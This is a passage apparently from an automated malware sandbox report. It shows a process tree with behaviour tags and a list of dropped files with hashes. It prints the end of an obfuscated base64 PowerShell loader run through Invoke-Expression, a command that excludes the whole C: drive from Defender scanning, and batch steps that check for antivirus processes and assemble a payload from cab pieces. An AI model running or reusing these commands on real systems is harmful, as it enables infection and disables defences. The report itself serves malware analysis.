d3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                                                                                                                                                                                          8⤵
                                                                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                          • Drops startup file
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:9548
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                                                                                                                                                                                            9⤵
                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:10040
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10413470101\21c17764c0.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10413470101\21c17764c0.exe"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:10316
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10413480101\PQPYAYJJ.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10413480101\PQPYAYJJ.exe"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:12088
                                                                                                                                                                                      • C:\Users\Admin\Abspawnhlp.exe
                                                                                                                                                                                        "C:\Users\Admin\Abspawnhlp.exe"
                                                                                                                                                                                        7⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:12260
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                                                                                                                                                                                          8⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                          PID:7148
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
                                                                                                                                                                                            9⤵
                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                            PID:1780
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            9⤵
                                                                                                                                                                                              PID:9852
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10413490101\captcha.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10413490101\captcha.exe"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:1640
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10413500101\7IIl2eE.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10413500101\7IIl2eE.exe"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                        • Checks computer location settings
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:7396
                                                                                                                                                                                        • C:\Windows\SysWOW64\CMD.exe
                                                                                                                                                                                          "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
                                                                                                                                                                                          7⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:3992
                                                                                                                                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                            tasklist
                                                                                                                                                                                            8⤵
                                                                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:9048
                                                                                                                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                            findstr /I "opssvc wrsa"
                                                                                                                                                                                            8⤵
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:9084
                                                                                                                                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                            tasklist
                                                                                                                                                                                            8⤵
                                                                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                                                                            PID:9188
                                                                                                                                                                                          • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                            findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:9140
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              cmd /c md 418377
                                                                                                                                                                                              8⤵
                                                                                                                                                                                                PID:9200
                                                                                                                                                                                              • C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                extrac32 /Y /E Leon.cab
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                  PID:9272
                                                                                                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                  findstr /V "BEVERAGES" Compilation
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                    PID:10052
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                      PID:9984
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                        PID:10160
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
                                                                                                                                                                                                        Passwords.com N
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                          PID:10216
                                                                                                                                                                                                        • C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                          choice /d y /t 5
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                            PID:10324
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10413510101\XOPPRUc.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10413510101\XOPPRUc.exe"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                        PID:2092
                                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                                          PID:5564
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10413520101\h8NlU62.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10413520101\h8NlU62.exe"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:9680
                                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                              PID:9752
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10413530101\HAe88WC.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10413530101\HAe88WC.exe"
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:10556
                                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                  PID:10380
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10413540101\c957c5bd94.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10413540101\c957c5bd94.exe"
                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                  PID:10496
                                                                                                                                                                                                      • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                                                                        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                          PID:1180
                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                            PID:676
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                            PID:5408
                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:5696
                                                                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:6092
                                                                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:5816
                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:5616
                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:5428
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 8376 -ip 8376
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:8872
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Identifies Wine through registry keys
                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                        PID:9880
                                                                                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{a795fcee-efbd-4e27-bb58-37ad1c119979}\959d1bc6-1dc1-48f1-8e7e-1c391c486b6d.cmd"0
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:5248

                                                                                                                                                                                                                        Network

                                                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                                                        Downloads

                                                                                                                                                                                                                        • C:\KVRT2020_Data\Temp\7C924DD4D20055C80007791130E2D03F\klupd_442fab23a_arkmon.sys

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          390KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          7c924dd4d20055c80007791130e2d03f

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          072f004ddcc8ddf12aba64e09d7ee0ce3030973e

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          406ab7d6e45dbedcfbd2d7376a643620c7462cece3e41115c8fbc07861177ec6

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          ab26005da50cbf1f45129834cb661b5b97aed5637d4ebc9821c8b744ff61c3f108f423ae5628602d99b3d859e184bfb23900797538dca2891186321d832ea806

                                                                                                                                                                                                                        • C:\Users\Admin\Abspawnhlp.exe

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          27KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          5b8fb06983be9063ef128fa5aee80b3a

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          c065a0ee84eb1fd646ea213bca20543306d7c9e1

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          ab5b956eca5ce83bf763d5f952316f17ba771adfd5cafd8ca9e262de61de4b4e

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          868cfbf9dd0a4ea9ececb290fa149959416ee2720c09e5bb8722cd1863626794afc2d5770e9244ba4e64b8e88c76e22e13af37aa42d745e1dbff4104258c8da2

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          649B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          f0f1000fa6713d2dd0053ed87f716621

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          ddb35f1a9eae59f8b7ad47b894161eda6e3e755d

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          15ccb260a00934b94e92ad367a34fbac0bb6d771d6cc697a58da23a0cad88e8e

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          84fe8445942263234f09c4d3c0a03e4bc5baa0a5b343e574c55ba28d2801deef39e21c30a8e3b6dff531517ea4f6a0bbb8700862eda47bbb7743b7ea12c72eee

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          d751713988987e9331980363e24189ce

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          9KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          bfac274703b1ae54c9a60f522ea5cd3f

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          793a2ee949153750573f3b91552f2ff510693238

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          47d9ea232ce27f2f9d22baa5d7b37aae6eecfb450629ae1729a82d21290c6d58

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          918d5512f8cb46970b39a13957ecb98531fe86211622d19e9485d8b912d1cfe0634783dd6822fd688b2bcb87def8fd6af5917da60b158a364167ba6078eba10c

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          13KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          828f5e0b82ccdcf1f8c96d30e77ad2c8

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          82ddbe795eb88dd87627626b89ce18d5cbc08ea2

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          aefbd69fdcd73e5b52bd651f9e12e0dc3309480d9fb4757a334688b807b05586

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          7d1a1636eb3d54ffa4682053c1dbc04f97043a0e60992faacd4e1f88712e07b910097dc735e83d3a853f1251aa2aff0ccb0d6880cf1d083b50934d480ad4914a

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nmmhkkegccagdldgiimedpiccmgmieda\CURRENT

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          16B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          46295cac801e5d4857d09837238a6394

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nmmhkkegccagdldgiimedpiccmgmieda\MANIFEST-000001

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          41B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          81KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          7a3995d42282b9413a81def7344c82f3

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          82e1827f732e79f6995c8e7420f239a5b37da42a

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          e5bcc1ea8ee2474912bb547918a8b47d4af7d9943c3266703e17e9131701967f

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          b3dc18627e0f6f0d3a084a4d8439813539fba8fd9f3ebdd7a563aeccaeeb97d9f31a5d9c3e50e742ce0500ca3cf4b36b04a1b9cbb4171603abf597d8b06bfc62

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          80KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          c73e23406f9c2577b20a4c0dc6904725

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          c15e1faeeeae66ae21b57536efdb38d1529d35e9

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          2b7785057318f6a49c84223f438340b87f1073c370e5fecbcdab7ea9402bcdab

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          93753e423ae6ab7511cfadc138156a17172d3e6ec9eae71bf62913da047bd238134abd596e1b6155d0d12ab4c117119d4a163f132c8330b5bb47a99844265fea

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          2f57fde6b33e89a63cf0dfdd6e60a351

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          445bf1b07223a04f8a159581a3d37d630273010f

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          25604a2821749d30ca35877a7669dff9

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          49c624275363c7b6768452db6868f8100aa967be

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          280B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          049e5a246ed025dee243db0ba8e2984c

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          15ec2d2b28dcfc17c1cfb5d0c13482d0706f942d

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          33071ca42c472861a2fabd0f82f8b03ef0daaa6796b24b83f3df02587e4c3d12

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          bc5f6fa6a8cae20ab40eae4552650d75f38ebb158c95288a79d9f332623bb507946513c39d19c00a5aee323df01f0f1a51c54594ef1c293289baf45f4ae2145b

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\533e85f4-8138-4a3b-b10e-c21aedc35a5f.tmp

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          2B

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          99914b932bd37a50b983c5e7c90ae93b

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          69KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          164a788f50529fc93a6077e50675c617

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17

                                                                                                                                                                                                                          SHA512

                                                                                                                                                                                                                          ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4

                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          107KB

                                                                                                                                                                                                                          MD5

                                                                                                                                                                                                                          40e2018187b61af5be8caf035fb72882

                                                                                                                                                                                                                          SHA1

                                                                                                                                                                                                                          72a0b7bcb454b6b727bf90da35879b3e9a70621e

                                                                                                                                                                                                                          SHA256

                                                                                                                                                                                                                          b3efd9d75856016510dd0bdb5e22359925cee7f2056b3cde6411c55ae8ae8ee5

